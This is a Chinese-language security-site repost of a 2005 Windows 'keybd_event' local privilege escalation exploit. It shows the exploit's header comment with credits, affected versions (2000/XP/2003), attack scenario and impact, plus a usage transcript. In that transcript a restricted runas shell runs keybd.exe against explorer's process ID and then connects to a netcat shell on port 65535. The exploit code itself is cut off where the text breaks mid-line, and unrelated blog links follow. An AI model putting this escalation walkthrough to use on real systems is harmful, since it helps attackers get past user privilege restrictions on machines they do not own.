• Microsoft Windows "keybd_event" Local Privilege Escalation Exploit


    文章整理:天天安全网   作者:佚名   发布时间:2005-09-09

    漏洞资料:http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
    危险程度:中等
    影响范围:Microsoft Windows 2000/XP/2003
    解决办法:暂时没有解决方案

    ------------------------------------------------------------------------------

    /*
    * Microsoft Windows keybd_event validation vulnerability.
    * Local privilege elevation
    *
    * Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com <http://haxorcitos.com>)
    * I馻ki Lopez ( ilo _@_ reversing.org <http://reversing.org> )
    *
    * Platforms afected/tested:
    *
    * - Windows 2000
    * - Windows XP
    * - Windows 2003
    *
    *
    * Original Advisory: http://www.haxorcitos.com
    * http://www.reversing.org
    *
    * Exploit Date: 08 / 06 / 2005
    *
    * Orignal Advisory:
    * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
    * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
    * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
    *
    * Attack Scenario:
    *
    * a) An attacker who gains access to an unprivileged shell/application executed
    * with the application runas.
    * b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
    *
    * Impact:
    *
    * Due to an invalid keyboard input validation, its possible to send keys to any
    * application of the Desktop.
    * By sending some short-cut keys its possible to execute code and elevate privileges
    * getting loggued user privileges and bypass runas/service security restriction.
    *
    * Exploit usage:
    *
    * C:/>whoami
    * AQUARIUS/Administrador
    *
    * C:/>runas /user:restricted cmd.exe
    * Enter the password for restricted:
    * Attempting to start cmd.exe as user "AQUARIUS/restricted" ...
    *
    *
    * Microsoft Windows 2000 [Version.00.2195]
    * (C) Copyright 1985-2000 Microsoft Corp.
    *
    * C:/WINNT/system32>cd /
    *
    * C:/>whoami
    * AQUARIUS/restricted
    *
    * C:/>tlist.exe |find "explorer.exe"
    * 1140 explorer.exe Program Manager
    *
    * C:/>c:/keybd.exe 1140
    * HANDLE Found. Attacking =)
    *
    * C:/>nc localhost 65535
    * Microsoft Windows 2000 [Versi

  • 相关阅读:
    windows服务程序
    DevExpress之时间控件
    DevExpress之列表控件
    Docker安装及基本使用
    配置阿里云yum源
    Centos7安装gitlab
    正则表达式
    sed进阶
    初识sed和gawk
    安装saltstack
  • 原文地址:https://www.cnblogs.com/AloneSword/p/2237664.html
Copyright © 2020-2023  润新知